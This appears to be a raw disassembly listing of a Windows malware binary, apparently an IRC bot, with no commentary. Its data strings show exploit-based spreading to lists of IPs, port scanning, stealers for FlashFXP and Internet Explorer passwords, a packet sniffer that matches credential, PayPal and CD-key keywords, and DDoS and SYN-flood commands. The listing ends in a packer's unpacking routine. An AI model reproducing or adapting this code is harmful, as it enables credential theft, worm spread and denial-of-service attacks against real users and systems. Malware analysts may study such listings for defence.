dd 34300320h, 3752502h, 78652002h, 696F6C70h, 69746174h
dd 73286E6Fh, 6E6F2029h, 34300320h, 3752502h, 50492002h
dd 2E297328h, 0
dword_416C70 dd 65747441h, 6974706Dh, 7420676Eh, 7865206Fh, 696F6C70h
; DATA XREF: sub_40E7C8+1F6�o
dd 30032074h, 73250234h, 77200203h, 20687469h, 2343003h
dd 2037325h, 2E2E2Eh
unk_416CA0 db 2Dh ; - ; DATA XREF: sub_40E7C8+39�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
aAttemptingTo_0 db '- Attempting to exploit IP',27h,'s in list.',0
align 10h
aAttemptingToEx db 'Attempting to exploit IP',27h,'s in list.',0 ; DATA XREF: sub_40EA34+43�o
dword_416CF4 dd 3003203Ah, 75250234h, 202E0203h, 0 ; DATA XREF: sub_40EA8E+7D�o
aExploitStatist db 'Exploit statistics - ',0 ; DATA XREF: sub_40EA8E+2C�o
align 4
aListingExploit db 'Listing exploit statistics',0 ; DATA XREF: sub_40EB64+21�o
align 4
dword_416D38 dd 62616E55h, 7420656Ch, 6F63206Fh, 63656E6Eh, 6F742074h
; DATA XREF: sub_40EB9C:loc_40EC48�o
dd 34300320h, 3732502h, 6F702002h, 3207472h, 25023430h
dd 2E020373h, 0
dword_416D68 dd 656D6954h, 2074756Fh, 7563636Fh, 20646572h, 6C696877h
; DATA XREF: sub_40EB9C+A5�o
dd 6F632065h, 63656E6Eh, 676E6974h, 206F7420h, 2343003h
dd 2037325h, 3430033Ah, 3732502h, 202E02h
dword_416DA0 dd 6E6E6F43h, 65746365h, 6F742064h, 34300320h, 3732502h
; DATA XREF: sub_40EB9C+72�o
dd 30033A02h, 73250234h, 69200203h, 3003206Eh, 75250234h
dd 203736Dh, 2Eh
dword_416DD0 dd 6E6E6F43h, 69746365h, 7420676Eh, 7325206Fh, 726F7020h
; DATA XREF: sub_40EC6F+A7�o
dd 30032074h, 73250234h, 203h
unk_416DF0 db 53h ; S ; DATA XREF: sub_40ED30+1B4�o
db 63h, 61h, 6Eh
db 6Eh ; n
db 65h, 64h, 20h
db 25h ; %
db 73h, 20h, 69h
db 6Eh ; n
db 20h, 3, 30h
db 34h ; 4
db 2, 25h, 30h
db 2Eh ; .
db 32h, 66h, 3
db 2
db 73h, 65h, 63h
db 2Eh ; .
db 20h, 3, 30h
db 34h ; 4
db 2, 25h, 75h
db 3
db 2, 20h, 6Fh
aPenPortSFound db 'pen port(s) found',0
align 4
dword_416E2C dd 33A7325h, 25023430h, 20020373h, 6F207369h, 6E6570h
; DATA XREF: sub_40ED30+164�o
dword_416E40 dd 3430032Dh, 3752502h, 53202D02h, 6E6E6163h, 20676E69h
; DATA XREF: sub_40ED30+81�o
dd 70207325h, 2074726Fh, 2343003h, 2037525h, 3430032Dh
dd 3752502h, 69772002h, 3206874h, 25023430h, 20020375h
dd 6B636F73h, 73287465h, 29h
dword_416E88 dd 6E616353h, 676E696Eh, 20732520h, 74726F70h, 34300320h
; DATA XREF: sub_40EF0E+15F�o
dd 3752502h, 30032D02h, 75250234h, 77200203h, 20687469h
dd 2343003h, 2037525h, 636F7320h, 2874656Bh, 2973h
aYa36za48dehfrv db 'yA36zA48dEhfrvghGRg57h5UlDv3',0 ; DATA XREF: sub_40F089+15�o
; sub_40F089+73�o
align 4
aSflashfxpSites db '%sFlashFXP\sites.dat',0 ; DATA XREF: sub_40F11A+DA�o
align 4
aFlashfxpSites_ db '\FlashFXP\sites.dat',0 ; DATA XREF: sub_40F11A+9C�o
aProgramfiles db 'ProgramFiles',0 ; DATA XREF: sub_40F11A+91�o
align 10h
aSites_dat db 'sites.dat',0 ; DATA XREF: sub_40F11A+6C�o
align 4
aFlashfxp_exe1 db 'FlashFXP.exe %1',0 ; DATA XREF: sub_40F11A+55�o
aSoftwareClasse db 'SOFTWARE\Classes\Applications\FlashFXP.exe\shell\open\command',0
; DATA XREF: sub_40F11A+15�o
align 4
unk_416F7C db 2Dh ; - ; DATA XREF: sub_40F21F+2D3�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
db 2Dh, 20h, 4Ch
db 69h ; i
db 73h, 74h, 65h
db 64h ; d
db 20h, 3, 30h
db 34h ; 4
db 2, 25h, 75h
db 3
db 2, 2Fh, 3
db 30h ; 0
db 34h, 2, 25h
db 75h ; u
db 3, 2, 20h
aFlashfxpPass_0 db 'FlashFXP password(s).',0
align 4
dword_416FB8 dd 2343003h, 2037525h ; DATA XREF: sub_40F21F+27A�o
a_FlashfxpFtpSS db '. FlashFXP - ftp://%s:%s@%s:%s - %s',0
aPass127s db 0Dh,0Ah ; DATA XREF: sub_40F21F+219�o
db 'Pass=%127s',0Dh,0Ah,0
align 4
aUser127s db 0Dh,0Ah ; DATA XREF: sub_40F21F+202�o
db 'User=%127s',0Dh,0Ah,0
align 4
aPort127s db 0Dh,0Ah ; DATA XREF: sub_40F21F+1EB�o
db 'Port=%127s',0Dh,0Ah,0
align 4
aIp127s db 0Dh,0Ah ; DATA XREF: sub_40F21F+1D4�o
db 'IP=%127s',0Dh,0Ah,0
align 4
asc_417024 db '[%[^]]]',0Dh,0Ah,0 ; DATA XREF: sub_40F21F+1A7�o
align 10h
aPass_0 db 0Dh,0Ah ; DATA XREF: sub_40F21F+130�o
db 'Pass=',0
aUser_0 db 0Dh,0Ah ; DATA XREF: sub_40F21F+122�o
db 'User=',0
aPort db 0Dh,0Ah ; DATA XREF: sub_40F21F+114�o
db 'Port=',0
aIp db 0Dh,0Ah ; DATA XREF: sub_40F21F+107�o
db 'IP=',0
align 10h
asc_417050 db 0Dh,0Ah ; DATA XREF: sub_40F21F:loc_40F31B�o
db 0Dh,0Ah
db '[',0
align 4
unk_417058 db 2Dh ; - ; DATA XREF: sub_40F21F+5C�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
aListingFlashfx db '- Listing FlashFXP passwords',0
align 10h
aFlashfxpPasswo db 'FlashFXP password stealer',0 ; DATA XREF: sub_40F515+21�o
align 4
unk_41709C db 2Dh ; - ; DATA XREF: sub_40F54D+718�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
db 2Dh, 20h, 4Ch
db 69h ; i
db 73h, 74h, 65h
db 64h ; d
db 20h, 3, 30h
db 34h ; 4
db 2, 25h, 75h
db 3
db 2, 20h, 69h
aNternetExplore db 'nternet explorer password(s).',0
align 4
dword_4170D8 dd 2343003h, 2037525h, 4549202Eh, 7475413Ah, 6D6F436Fh
; DATA XREF: sub_40F54D+688�o
dd 74656C70h, 61502065h, 6F777373h, 20736472h, 6953202Dh
dd 203A6574h, 2343003h, 2037325h, 614E202Eh, 203A656Dh
dd 2343003h, 2037325h, 6150202Eh, 6F777373h, 203A6472h
dd 2343003h, 2037325h, 2Eh
dword_417134 dd 2343003h, 2037525h, 4549202Eh, 7475413Ah, 6F43206Fh
; DATA XREF: sub_40F54D+5F2�o
dd 656C706Dh, 66206574h, 646C6569h, 202D2073h, 6C656946h
dd 3203A64h, 25023430h, 2E020373h, 74614420h, 3203A61h
dd 25023430h, 2E020373h, 0
dword_41717C dd 70747468h, 2F3A73h ; DATA XREF: sub_40F54D+5B0�o
dword_417184 dd 70747468h, 2F3Ah ; DATA XREF: sub_40F54D+599�o
dword_41718C dd 7274533Ah, 676E69h ; DATA XREF: sub_40F54D+554�o
aStringindex db 'StringIndex',0 ; DATA XREF: sub_40F54D+53F�o
aE161255a db 'e161255a',0 ; DATA XREF: sub_40F54D+525�o
align 4
dword_4171AC dd 2343003h, 2037525h, 534D202Eh, 7845204Eh, 726F6C70h
; DATA XREF: sub_40F54D+4FE�o
dd 2D207265h, 4E534D20h, 3A444920h, 34300320h, 3732502h
dd 50202E02h, 77737361h, 3A64726Fh, 34300320h, 3732502h
dd 2E02h
dword_4171EC dd 2Ch ; DATA XREF: sub_40F54D+442�o
; sub_40F54D+619�o
aB9819c52 db 'b9819c52',0 ; DATA XREF: sub_40F54D+3B7�o
align 4
dword_4171FC dd 2343003h, 2037525h, 4549202Eh, 7361503Ah, 726F7773h
; DATA XREF: sub_40F54D+3A3�o
dd 72502D64h, 6365746Fh, 20646574h, 6953202Dh, 203A6574h
dd 2343003h, 2037325h, 614E202Eh, 203A656Dh, 2343003h
dd 2037325h, 6150202Eh, 6F777373h, 203A6472h, 2343003h
dd 2037325h, 2Eh
a5e7e8100 db '5e7e8100',0 ; DATA XREF: sub_40F54D+310�o
align 10h
dword_417260 dd 2343003h, 2037525h, 754F202Eh, 6F6F6C74h, 7078456Bh
; DATA XREF: sub_40F54D+2FC�o
dd 73736572h, 4E202D20h, 3A656D61h, 34300320h, 3732502h
dd 50202E02h, 77737361h, 3A64726Fh, 34300320h, 3732502h
dd 2E02h
a220d5cc1 db '220d5cc1',0 ; DATA XREF: sub_40F54D+2CE�o
align 4
aWs db '%ws',0 ; DATA XREF: sub_40F54D+1FA�o
asc_4172B0 db '%x',0 ; DATA XREF: sub_40F54D+117�o
align 4
unk_4172B4 db 2Dh ; - ; DATA XREF: sub_40F54D+B0�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
aListingInterne db '- Listing internet explorer passwords',0
align 8
dword_4172E8 dd 5A6F1EC0h, 11D02DB1h, 0C000398Ch, 6B12D94Fh ; DATA XREF: sub_40F54D+85�o
; sub_40F54D+154�o ...
aInternetExplor db 'Internet explorer password stealer',0 ; DATA XREF: sub_40FCB2+2A�o
align 4
dword_41731C dd 65746E49h, 74736572h, 20676E69h, 636F7270h, 65737365h
; DATA XREF: sub_40FD00+180�o
dd 202D2073h, 75736956h, 43206C61h, 36202B2Bh, 3003203Ah
dd 73250234h, 202E0203h, 65726E55h, 52496C61h, 203A4443h
dd 2343003h, 2037325h, 7453202Eh, 3A6D6165h, 34300320h
dd 3732502h, 57202E02h, 646C726Fh, 20664F20h, 63726157h
dd 74666172h, 3003203Ah, 73250234h, 202E0203h, 716E6F43h
dd 20726575h, 696C6E4Fh, 203A656Eh, 2343003h, 2037325h
dd 2Eh
aSoftwareValveS db 'Software\Valve\Steam',0 ; DATA XREF: sub_40FD00+EF�o
align 4
aSoftwareMicr_0 db 'SOFTWARE\Microsoft\VisualStudio\6.0\Setup\Microsoft Visual C++',0
; DATA XREF: sub_40FD00+BF�o
align 4
aConquer db '[Conquer]',0 ; DATA XREF: sub_40FD00+91�o
align 10h
aWorldOfWarcraf db 'World Of Warcraft',0 ; DATA XREF: sub_40FD00+77�o
align 4
aUnreal3 db 'Unreal3',0 ; DATA XREF: sub_40FD00+59�o
aListingInteres db 'Listing interesting processes',0 ; DATA XREF: sub_40FEA2+21�o
align 4
off_41744C dd offset aUser_1 ; DATA XREF: sub_40FF2A+2D�o
; "user "
dd offset aUnknown_1 ; "unknown "
dd offset aPass_2 ; "pass "
dd offset aMailpass ; "MailPass "
dd offset aOper ; "oper "
dd 0
dd offset aIdentify ; "identify "
dd 0
dd offset aAuth_0 ; " :auth "
dd 0
dd offset aPasswd_0 ; "passwd="
dd 0
dd offset aUsername_0 ; "username="
dd 0
dd offset aPassword_0 ; "password="
dd 0
dd offset aLogin_1 ; "login="
dd 0
dd offset aPass_1 ; "pass="
dd 0
dd offset aPw ; "pw="
dd 2 dup(0)
off_4174A8 dd offset aLogin_0 ; DATA XREF: sub_40FF2A+45�o
; "login "
align 10h
dd offset aSxt ; "sxt "
align 8
dd offset aAuth ; "auth "
align 10h
dd offset aPasswort ; "passwort "
align 8
dd offset aCdkey ; "cdkey"
align 10h
dd offset aCdKey_0 ; "cd-key"
align 8
dd offset aCdKey ; "cd key"
align 10h
dd offset aPassword ; "password"
align 8
dd offset aPaypal_com ; "paypal.com"
align 10h
dd offset aPaypal ; "paypal"
align 8
dd offset aIrcOperator ; "irc operator"
align 10h
dd offset aLP ; "l/p"
align 8
dd offset aSsh1_5 ; "SSH-1.5"
align 10h
dd offset aSsh1_99 ; "SSH-1.99"
dd 2 dup(0)
off_41751C dd offset aSetCookie ; DATA XREF: sub_40FF2A+5D�o
; "Set-Cookie:"
dd 0
dd offset aSyn ; "syn"
dd 0
dd offset aFlood ; "flood "
dd 0
dd offset aClone ; "clone "
dd 0
dd offset aServU_0 ; "serv-u"
dd 0
dd offset aServU ; "serv u"
dd 0
dd offset aServu ; "servu"
dd 0
dd offset aDdos ; "ddos"
align 10h
off_417560 dd offset dword_4175BC ; DATA XREF: sub_40FF2A+75�o
align 8
dd offset dword_4175B4
align 10h
dd offset dword_4175AC
align 8
dd offset dword_4175A4
align 10h
dd offset dword_41759C
align 8
dd offset dword_417594
dd 2 dup(0)
dword_417594 dd 54495551h, 20h ; DATA XREF: .data:00417588�o
dword_41759C dd 54524150h, 20h ; DATA XREF: .data:00417580�o
dword_4175A4 dd 4E494F4Ah, 20h ; DATA XREF: .data:00417578�o
dword_4175AC dd 49504F54h, 2043h ; DATA XREF: .data:00417570�o
dword_4175B4 dd 49544F4Eh, 204543h ; DATA XREF: .data:00417568�o
dword_4175BC dd 56495250h, 2047534Dh, 0 ; DATA XREF: .data:off_417560�o
aDdos db 'ddos',0 ; DATA XREF: .data:00417554�o
align 10h
aServu db 'servu',0 ; DATA XREF: .data:0041754C�o
align 4
aServU db 'serv u',0 ; DATA XREF: .data:00417544�o
align 10h
aServU_0 db 'serv-u',0 ; DATA XREF: .data:0041753C�o
align 4
aClone db 'clone ',0 ; DATA XREF: .data:00417534�o
align 10h
aFlood db 'flood ',0 ; DATA XREF: .data:0041752C�o
align 4
aSyn db 'syn',0 ; DATA XREF: .data:00417524�o
aSetCookie db 'Set-Cookie:',0 ; DATA XREF: .data:off_41751C�o
aSsh1_99 db 'SSH-1.99',0 ; DATA XREF: .data:00417510�o
align 4
aSsh1_5 db 'SSH-1.5',0 ; DATA XREF: .data:00417508�o
aLP db 'l/p',0 ; DATA XREF: .data:00417500�o
aIrcOperator db 'irc operator',0 ; DATA XREF: .data:004174F8�o
align 10h
aPaypal db 'paypal',0 ; DATA XREF: .data:004174F0�o
align 4
aPaypal_com db 'paypal.com',0 ; DATA XREF: .data:004174E8�o
align 4
aCdKey db 'cd key',0 ; DATA XREF: .data:004174D8�o
align 4
aCdKey_0 db 'cd-key',0 ; DATA XREF: .data:004174D0�o
align 4
aCdkey db 'cdkey',0 ; DATA XREF: .data:004174C8�o
align 4
aPasswort db 'passwort ',0 ; DATA XREF: .data:004174C0�o
align 4
aAuth db 'auth ',0 ; DATA XREF: .data:004174B8�o
align 10h
aSxt db 'sxt ',0 ; DATA XREF: .data:004174B0�o
align 4
aLogin_0 db 'login ',0 ; DATA XREF: .data:off_4174A8�o
align 10h
aPw db 'pw=',0 ; DATA XREF: .data:0041749C�o
aPass_1 db 'pass=',0 ; DATA XREF: .data:00417494�o
align 4
aLogin_1 db 'login=',0 ; DATA XREF: .data:0041748C�o
align 4
aPassword_0 db 'password=',0 ; DATA XREF: .data:00417484�o
align 10h
aUsername_0 db 'username=',0 ; DATA XREF: .data:0041747C�o
align 4
aPasswd_0 db 'passwd=',0 ; DATA XREF: .data:00417474�o
aAuth_0 db ' :auth ',0 ; DATA XREF: .data:0041746C�o
aIdentify db 'identify ',0 ; DATA XREF: .data:00417464�o
align 4
aOper db 'oper ',0 ; DATA XREF: .data:0041745C�o
align 10h
aMailpass db 'MailPass ',0 ; DATA XREF: .data:00417458�o
align 4
aPass_2 db 'pass ',0 ; DATA XREF: .data:00417454�o
align 4
aUnknown_1 db 'unknown ',0 ; DATA XREF: .data:00417450�o
align 10h
aUser_1 db 'user ',0 ; DATA XREF: .data:off_41744C�o
align 4
dword_4176F8 dd 70737553h, 6F696369h, 70207375h, 656B6361h, 72662074h
; DATA XREF: sub_40FFBC+379�o
dd 3206D6Fh, 25023430h, 3A020373h, 2343003h, 2037525h
dd 73253E2Dh, 2075253Ah, 0
unk_41772C db 2Dh ; - ; DATA XREF: sub_40FFBC+FB�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
db 2Dh, 20h, 4Ch
db 65h ; e
db 76h, 65h, 6Ch
db 20h
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
aPacketSnifferR db ' packet sniffer running',0
align 10h
dword_417760 dd 6576654Ch, 3003206Ch, 75250234h, 70200203h, 656B6361h
; DATA XREF: sub_41041B+6F�o
dd 6E732074h, 65666669h, 72h, 417784h, 0DE86ABE6h, 0D19B9286h
dd 0FE85E38Ah, 2 dup(0)
dword_417798 dd 9EC754A2h ; DATA XREF: seg000:004105A3�r
; seg000:00410627�o
dword_41779C dd 0FE66D46Ah ; DATA XREF: seg000:0041059C�r
dword_4177A0 dd 24016BE8h ; DATA XREF: seg000:00410591�r
dword_4177A4 dd 58A92B8h ; DATA XREF: seg000:0041058B�r
dd 0
off_4177AC dd offset dword_417A7C ; DATA XREF: sub_4098BB+108�r
; sub_4098BB+110�o ...
dd 2 dup(0)
off_4177B8 dd offset dword_4166F0 ; DATA XREF: sub_408832+51�r
; sub_408832+59�o ...
off_4177BC dd offset dword_4166E4 ; DATA XREF: sub_408832+85�r
off_4177C0 dd offset dword_4166D8 ; DATA XREF: sub_408832+96�r
dd offset dword_4166C8
dd offset dword_4166BC
dd offset dword_4166D8
dd 3 dup(0)
; ---------------------------------------------------------------------------
loc_4177DC: ; DATA XREF: sub_4088FC+126�o
; sub_408F9D+27B�o
test eax, 978DD6FBh
retn
; ---------------------------------------------------------------------------
dw 9ED0h
dd 2 dup(0)
dword_4177EC dd 6F7823h, 1Fh dup(0) ; DATA XREF: sub_40287C+109�o
; sub_4064A0+59�o ...
byte_41786C db 0B5h ; DATA XREF: sub_4088FC+23E�r
; sub_4088FC+24D�o
db 0BCh, 86h, 9Fh
dd 0C0h, 1Eh dup(0)
byte_4178EC db 0 ; DATA XREF: sub_4088FC+261�r
; sub_4088FC+26F�o
align 10h
dd 1Fh dup(0)
dword_41796C dd 3430032Eh, 4F4E4102h, 203h ; DATA XREF: sub_40735A:loc_408362�o
; sub_408F9D+206�o
dword_417978 dd 0D18BA1E1h, 8FDDCFC4h, 9BE0C0h, 3Eh dup(0) ; DATA XREF: sub_4045E4+33�o
; sub_404691+32�o
dword_417A7C dd 0DD9184BCh, 2 dup(0) ; DATA XREF: .data:off_4177AC�o
dword_417A88 dd 3430032Dh, 62656402h, 2036775h ; DATA XREF: seg000:00410802�o
aEipHasLeftTheE db '- eip has left the endless loop for some reason...',0
align 4
aEntry db 'entry',0 ; DATA XREF: seg000:004107DB�o
align 10h
aLoop db 'loop',0 ; DATA XREF: seg000:loc_4107A7�o
align 4
aPing08x db 'PING :%08X',0 ; DATA XREF: seg000:0041074C�o
align 4
a08xX08x3x08x08 db '%08x%x%08x%3x%08x%08x',0 ; DATA XREF: seg000:004105A9�o
align 10h
dword_417B00 dd 0DF0B3D60h, 101B548Fh, 8658Eh, 19D12B2Bh ; DATA XREF: sub_410B6E+15�o
off_417B10 dd offset off_4112CC ; DATA XREF: seg001:off_4112D0�o
; seg001:0041130C�o ...
align 8
a_?av_com_error db '.?AV_com_error@@',0
align 10h
off_417B30 dd offset off_4112CC ; DATA XREF: seg001:off_411318�o
; seg001:00411354�o
align 8
a_?avtype_info@ db '.?AVtype_info@@',0
dword_417B48 dd 0 ; DATA XREF: sub_401534:loc_401548�r
; sub_401621+143�w
dword_417B4C dd 0 ; DATA XREF: sub_401534:loc_401555�r
; sub_401621+14B�w ...
dword_417B50 dd 0 ; DATA XREF: sub_401534:loc_401562�r
; sub_401621+AC�o ...
dword_417B54 dd 0 ; DATA XREF: sub_401534�r
; sub_401621+13B�w ...
dd 0
dword_417B5C dd 0 ; DATA XREF: sub_401571+35�r
; sub_401571+50�r ...
byte_417B60 db 0 ; DATA XREF: sub_401621+10B�o
; sub_402230+3B�r ...
align 8
dword_417B68 dd 0 ; DATA XREF: sub_40287C+1D�r
; sub_4038E1:loc_4038F3�r ...
dword_417B6C dd 0 ; DATA XREF: sub_40287C+E�o
dword_417B70 dd 77E7C706h ; DATA XREF: sub_402D7B+21�w
; sub_406AB6+F�r
align 8
dword_417B78 dd 71C245E0h ; DATA XREF: sub_402D7B+42�w
dword_417B7C dd 71C243F6h ; DATA XREF: sub_402D7B+4F�w
dword_417B80 dd 71C59904h ; DATA XREF: sub_402D7B+5C�w
dword_417B84 dd 71C453F8h ; DATA XREF: sub_402D7B+69�w
dword_417B88 dd 71C2FA86h ; DATA XREF: sub_402D7B+76�w
dword_417B8C dd 71C574FAh ; DATA XREF: sub_402D7B+83�w
dword_417B90 dd 71C214BAh ; DATA XREF: sub_402D7B+90�w
dword_417B94 dd 71C4A1B4h ; DATA XREF: sub_402D7B+9D�w
dword_417B98 dd 71C59530h ; DATA XREF: sub_402D7B+A4�w
dword_417B9C dd 71B2ACCBh ; DATA XREF: sub_402D7B+C4�w
; sub_40C225+12�r ...
dword_417BA0 dd 71B22C25h ; DATA XREF: sub_402D7B+D1�w
dword_417BA4 dd 71B2A381h ; DATA XREF: sub_402D7B+DE�w
; sub_40C225+1E�r ...
dword_417BA8 dd 71B28D0Dh ; DATA XREF: sub_402D7B+E5�w
dword_417BAC dd 7622A3F4h ; DATA XREF: sub_402D7B+17A�w
; sub_405E4E+D3�r
dword_417BB0 dd 5E0C4E7Dh ; DATA XREF: sub_402D7B+162�w
; sub_40F54D+41�r ...
dword_417BB4 dd 71AB33DFh ; DATA XREF: sub_402D7B+101�w
; sub_402D7B+115�r ...
dword_417BB8 dd 71ABC076h ; DATA XREF: sub_401B81+9A�r
; sub_402D7B+10E�w ...
dword_417BBC dd 71AB3A2Ch ; DATA XREF: sub_402D7B+11C�w
; sub_402D7B+145�w ...
dd 101h dup(0)
dword_417FC4 dd 0 ; DATA XREF: sub_4032EF�r
; sub_4032EF+1B�o
dword_417FC8 dd 0 ; DATA XREF: sub_4032EF+F�o
; sub_4032EF:loc_403317�r
align 10h
dword_417FD0 dd 76BF1C22h ; DATA XREF: sub_403E9B+40�w
; sub_403E9B+63�r ...
dword_417FD4 dd 76BF1D54h ; DATA XREF: sub_403E9B+4D�w
; sub_403E9B+6C�r ...
dword_417FD8 dd 76BF1E6Ch ; DATA XREF: sub_403E9B+5B�w
; sub_403F1D+150�r
dword_417FDC dd 76BF32DDh ; DATA XREF: sub_403E9B+33�w
; sub_403E9B+54�r ...
dword_417FE0 dd 14AE70h, 0FFFFFFFFh, 5 dup(0) ; DATA XREF: sub_403E9B+1�o
; sub_403F1D+C�o ...
byte_417FFC db 1 ; DATA XREF: sub_403E9B+79�w
; sub_403F1D+16�r
align 10h
dword_418000 dd 0 ; DATA XREF: sub_406324:loc_406394�w
; sub_40640D:loc_406474�r
align 8
dword_418008 dd 14AE98h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: sub_40647C+16�o
; sub_40663C+7�o ...
dword_418020 dd 0 ; DATA XREF: sub_40647C�w
; sub_40663C+11�r ...
align 8
dword_418028 dd 883A00h ; DATA XREF: sub_40647C+11�w
; sub_40663C:loc_406667�r ...
dword_41802C dd 0 ; DATA XREF: sub_406B1B+6�r
; sub_406BE0+60�w ...
dword_418030 dd 0 ; DATA XREF: sub_406BE0+42�w
; sub_406BE0+65�r ...
dword_418034 dd 0 ; DATA XREF: sub_406B1B+A9�r
; sub_406BE0+7F�w ...
dword_418038 dd 0 ; DATA XREF: sub_406B1B+80�r
; sub_406BE0+72�w ...
align 10h
byte_418040 db 0 ; DATA XREF: sub_406BE0+2D�r
; sub_406BE0+84�w
align 4
dd 101h dup(0)
byte_418448 db 0 ; DATA XREF: sub_408832+B�o
; sub_4088FC+27�r ...
align 4
dd 5Fh dup(0)
dword_4185C8 dd 40h dup(0) ; DATA XREF: sub_408832+15�o
; sub_408832+7B�o ...
dword_4186C8 dd 3 dup(0) ; DATA XREF: sub_408832:loc_408862�o
; sub_408832+8B�o ...
dword_4186D4 dd 0 ; DATA XREF: sub_40882C�r
; sub_408BA7+15�r ...
dd 0
dword_4186DC dd 0 ; DATA XREF: sub_4098BB+47�w
byte_4186E0 db 0 ; DATA XREF: sub_409AB1+6�o
; sub_409AB1+15�w ...
align 4
dd 9 dup(0)
dd 3E000000h, 3F000000h, 37363534h, 3B3A3938h, 3D3Ch, 0
dd 2010000h, 6050403h, 0A090807h, 0E0D0C0Bh, 1211100Fh
dd 16151413h, 191817h, 0
db 0
db 1Ah, 1Bh, 1Ch
db 1Dh
db 1Eh, 1Fh, 20h
a_0123 db '!"#$%&',27h,'()*+,-./0123',0
dd 22h dup(0)
byte_4187E4 db 0A5h ; DATA XREF: sub_409C8B+22�o
; sub_409C8B+2F�o ...
db 4Ch, 0D2h, 0C8h
dd 43B7C728h, 32FBC842h, 0AA6009Dh, 0
dword_4187F8 dd 3187DD79h, 178BAD05h, 67BB4D1Dh, 513F55B9h, 0 ; DATA XREF: sub_409D01+24�o
; sub_409D01+31�o ...
dword_41880C dd 0E5B73575h ; DATA XREF: sub_40A9A3+24�o
; sub_40AA05+5�w ...
dword_418810 dd 0CDB3E8EEh ; DATA XREF: sub_40A9A3+30�o
; sub_40AA05+F�w ...
dword_418814 dd 0A2A51CFBh ; DATA XREF: sub_40A9A3+3C�o
; sub_40AA05+19�w ...
dword_418818 dd 40515006h ; DATA XREF: sub_40A9A3+48�o
; sub_40AA05+23�w ...
align 10h
byte_418820 db 96h ; DATA XREF: sub_40ABCC+24�o
; sub_40ABCC+31�o ...
db 0C4h, 0E9h, 0B2h
dd 0A1EFFCA8h, 99F78CA4h, 82B580F6h, 2 dup(0)
dword_418838 dd 2 dup(0) ; DATA XREF: sub_40CA47+448�o
dword_418840 dd 0 ; DATA XREF: sub_40D201+308�o
dword_418844 dd 2 dup(0) ; DATA XREF: sub_40D201+31A�o
dword_41884C dd 0 ; DATA XREF: sub_40D88A+E�r
; sub_40D88A+1F�w
dword_418850 dd 0 ; DATA XREF: sub_40D88A:loc_40D90F�w
; sub_40D88A:loc_40D915�r
dword_418854 dd 2 dup(0) ; DATA XREF: sub_40DC42�o
; sub_40DCB8+78�o
dword_41885C dd 6B636170h, 652E6465h, 6578h, 3Eh dup(0) ; DATA XREF: sub_4049B5+12D�o
; sub_404BC3:loc_404C67�o ...
dword_418960 dd 0A49A36F0h ; DATA XREF: seg000:0041064A�w
dword_418964 dd 0EC358150h ; DATA XREF: seg000:00410654�w
dword_418968 dd 35365FAFh ; DATA XREF: seg000:0041065E�w
dword_41896C dd 3C5507FBh ; DATA XREF: seg000:00410668�w
dword_418970 dd 6B636170h, 652E6465h, 6578h, 3Fh dup(0) ; DATA XREF: sub_40735A+51A�o
; sub_40735A+52E�o ...
dword_418A78 dd 40h dup(0) ; DATA XREF: sub_40735A+7C0�o
; sub_4088FC+26A�o ...
byte_418B78 db 0 ; DATA XREF: sub_4088FC+E2�r
; sub_4088FC+EB�o ...
align 4
dd 1Fh dup(0)
byte_418BF8 db 0 ; DATA XREF: sub_402EFD+E4�r
; sub_402EFD+F0�o ...
align 4
dd 1Fh dup(0)
dword_418C78 dd 40h dup(0) ; DATA XREF: sub_403289+34�o
; sub_405580+54�o ...
byte_418D78 db 0 ; DATA XREF: sub_40735A+EC6�o
; sub_4088FC+7F�r ...
align 400h
_data ends
; Section 4. (virtual address 00019000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00001000 ( 4096.)
; Offset to raw data for section: 00019000
; Flags E0000020: Text Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
SoftComp segment para public 'CODE' use32
assume cs:SoftComp
;org 419000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
dd 77E7A5FDh, 77E7980Ah, 77E805D8h, 77E79E34h, 77D6ADD7h
dd 400000h, 83A5611Dh, 0E93F94E9h, 0D72D8250h, 0C61C7182h
dd 0B50B6071h, 0A4F94F60h, 41534C54h, 0Ah dup(0)
; =============== S U B R O U T I N E =======================================
public start
start proc near
var_24 = dword ptr -24h
arg_4B = dword ptr 4Fh
; FUNCTION CHUNK AT 00419127 SIZE 000000E6 BYTES
; FUNCTION CHUNK AT 00419210 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0041921B SIZE 00000028 BYTES
pusha
jmp loc_419127
start endp
; =============== S U B R O U T I N E =======================================
sub_419062 proc near ; CODE XREF: start+17C�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 00419101 SIZE 0000000A BYTES
pusha
mov esi, [esp+20h+arg_0]
mov edi, [esp+20h+arg_4]
cld
mov dl, 80h
xor ebx, ebx
loc_419070: ; CODE XREF: sub_419062+16�j
movsb
mov bl, 2
loc_419073: ; CODE XREF: sub_419062+3B�j
; sub_419062+81�j
call sub_4190E5
jnb short loc_419070
xor ecx, ecx
call sub_4190E5
jnb short loc_41909F
xor eax, eax
call sub_4190E5
jnb short loc_4190AF
mov bl, 2
inc ecx
mov al, 10h
loc_419091: ; CODE XREF: sub_419062+36�j
call sub_4190E5
adc al, al
jnb short loc_419091
jnz short loc_4190DB
stosb
jmp short loc_419073
; ---------------------------------------------------------------------------
loc_41909F: ; CODE XREF: sub_419062+1F�j
call sub_4190F1
sub ecx, ebx
jnz short loc_4190B8
call sub_4190EF
jmp short loc_4190D7
; ---------------------------------------------------------------------------
loc_4190AF: ; CODE XREF: sub_419062+28�j
lodsb
shr eax, 1
jz short loc_419101
adc ecx, ecx
jmp short loc_4190D4
; ---------------------------------------------------------------------------
loc_4190B8: ; CODE XREF: sub_419062+44�j
xchg eax, ecx
dec eax
shl eax, 8
lodsb
call sub_4190EF
cmp eax, 7D00h
jnb short loc_4190D4
cmp ah, 5
jnb short loc_4190D5
cmp eax, 7Fh
ja short loc_4190D6
loc_4190D4: ; CODE XREF: sub_419062+54�j
; sub_419062+66�j
inc ecx
